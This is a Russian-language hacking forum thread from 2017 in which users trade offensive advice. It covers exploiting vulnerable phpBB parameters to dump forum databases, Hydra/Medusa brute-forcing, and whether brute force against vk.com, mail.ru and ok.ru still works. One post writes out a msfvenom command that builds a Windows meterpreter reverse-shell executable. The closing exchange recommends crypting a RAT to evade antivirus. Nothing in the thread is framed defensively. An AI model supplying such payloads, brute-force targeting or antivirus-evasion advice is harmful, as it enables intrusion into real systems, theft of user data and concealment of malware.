Задай Вопрос - Получи Ответ

aNim · 10 Май 2017

и как можно это использовать себе на руку?)

lukeone · 10 Май 2017

Данная тема предназначена для ваших вопросов, исключительно на тему уязвимостей. Создавать темы, посвященные какому - либо вопросу, касающихся уязвимостей - не нужно, всё спрашиваем тут.

ЧиньКа написал(а):

и как можно это использовать себе на руку?)

Нажмите для раскрытия...

Данный вопрос был в теме с уязвимостями phpBB, там был код с уязвимыми параметрами на phpBB некоторых версиях в POST запросах, и если вы такие встретите, то можете протестировать эти параметры и если они окажутся уязвимыми, то получить базу данных форума. Чаще всего на тестируемых версиях они так и остаются уязвимыми и только с обновлением закрывают уязвимости.

Cikad · 10 Май 2017

lukeone написал(а):
Данная тема предназначена для ваших вопросов, исключительно на тему уязвимостей. Создавать темы, посвященные какому - либо вопросу, касающихся уязвимостей - не нужно, всё спрашиваем тут.

Данный вопрос был в теме с уязвимостями phpBB, там был код с уязвимыми параметрами на phpBB некоторых версиях в POST запросах, и если вы такие встретите, то можете протестировать эти параметры и если они окажутся уязвимыми, то получить базу данных форума. Чаще всего на тестируемых версиях они так и остаются уязвимыми и только с обновлением закрывают уязвимости.

Можете подсказать скрипт или программу , аналогичную с hydra?

lukeone · 10 Май 2017

Cikad написал(а):
Можете подсказать скрипт или программу , аналогичную с hydra?

медуза)

Cikad · 10 Май 2017

lukeone написал(а):
медуза)

Как вы думаете , актуальна ли сейчас брутфорс атака на , какие-то крупные сайты ( vk.com ; mail.ru ; ok.ru ) ? Или там давно стоит защита от такого рода атак ?

lukeone · 10 Май 2017

Cikad написал(а):
Как вы думаете , актуальна ли сейчас брутфорс атака на , какие-то крупные сайты ( vk.com ; mail.ru ; ok.ru ) ? Или там давно стоит защита от такого рода атак ?

брутфорс всегда актуален, но меня он не особо интересует, так как подобрать пароль это какой то шанс, по мне гораздо интереснее найти ошибку и эксплуатировать её для повышения прав, удалённого доступа или для получения базы данных)

Cikad · 10 Май 2017

lukeone написал(а):
брутфорс всегда актуален, но меня он не особо интересует, так как подобрать пароль это какой то шанс, по мне гораздо интереснее найти ошибку и эксплуатировать её для повышения прав, удалённого доступа или для получения базы данных)

Идея хорошая даже очень , но для этого нужно многое знать ...

Cikad · 12 Май 2017

Может , кто подсказать правильную команду для создание обратной оболочки ? Пробовал эту : msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 R > CDE.exe , но при запуске самого .exe файла на Windows 10 выдает такую ошибку : невозможно запустить это приложение на вашем пк windows 10 .

Cikad · 14 Май 2017

Кто знает , как можно спрятать вирус-ратник от антивирусных систем ?

Nervous · 14 Май 2017

Cikad написал(а):
Кто знает , как можно спрятать вирус-ратник от антивирусных систем ?

Закрuптуй его .-.

Поиск

Задай Вопрос - Получи Ответ

aNim

lukeone

Гость

Cikad

Участник

lukeone

Гость

Cikad

Участник

lukeone

Гость

Cikad

Участник

Cikad

Участник

Cikad

Участник

Nervous